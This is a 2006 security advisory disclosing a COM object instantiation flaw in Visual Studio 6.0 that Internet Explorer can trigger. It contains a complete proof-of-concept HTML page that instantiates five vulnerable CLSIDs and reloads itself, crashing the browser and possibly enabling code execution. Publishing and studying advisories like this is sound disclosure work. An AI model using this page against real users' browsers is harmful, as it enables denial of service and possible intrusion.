Advisory ID:
XSec-06-07
Advisory Name:
Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability
Release Date:
08/18/2006
Tested on:
Visual Studio 6.0/Internet Explorer 6.0 SP1
Affected version:
Visual Studio 6.0
Author:
nop <nop#xsec.org>
http://www.xsec.org
Overview:
Multiple vulnerability has been found in Visual Studio 6.0 When Internet Explorer tries to instantiate the TCPROPS.DLL, FP30WEC.DLL,mdt2db.dll,mdt2qd.dll,VI30AUT.DLL (Visual Stuido 6.0) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker may DoS and possibly could execute arbitrary code.
Exploit:
=============== vs6.htm start ================
<!--
// Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability
// tested on Windows 2000/2003
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}
// Info: FpFile Class// ProgID: WECAPI.FpFile.1
// InprocServer32: C:WINDOWSSystemFP30WEC.DLL
// CLSID: {AB39F080-0F5D-11D1-8E2F-00C04FB68D60}
// Info: TCExtPage Class
// InprocServer32: C:PROGRA~1MICROS~1CommonToolsTCPROPS.DLL
// CLSID: {CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}
// Info: FpaFile Class// ProgID: FpaFile.FpaFile.1
// InprocServer32: C:WINDOWSsystemVI30AUT.DLL
// CLSID: {E9B0E6CB-811C-11D0-AD51-00A0C90F5739}
// Info: Microsoft Data Tools Query Designer// ProgID: MSDTQueryDesigner2
// InprocServer32: C:Program FilesCommon FilesMicrosoft
SharedMSDesigners98mdt2qd.dll
// CLSID: {E9B0E6D4-811C-11D0-AD51-00A0C90F5739}
// Info: Microsoft Data Tools Database Designer// ProgID:
MSDTDatabaseDesigner2
// InprocServer32: C:Program FilesCommon FilesMicrosoft
SharedMSDesigners98mdt2db.dll
--!>
<html><body>
<object classid="CLSID:{9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}"> </object>
<object classid="CLSID:{AB39F080-0F5D-11D1-8E2F-00C04FB68D60}"> </object>
<object classid="CLSID:{CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}"> </object>
<object classid="CLSID:{E9B0E6CB-811C-11D0-AD51-00A0C90F5739}"> </object>
<object classid="CLSID:{E9B0E6D4-811C-11D0-AD51-00A0C90F5739}"> </object>
<!--
</body>
<script>location.reload();</script>
</html>
=============== vs6.htm end ==================
Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=15
About XSec:
We are redhat.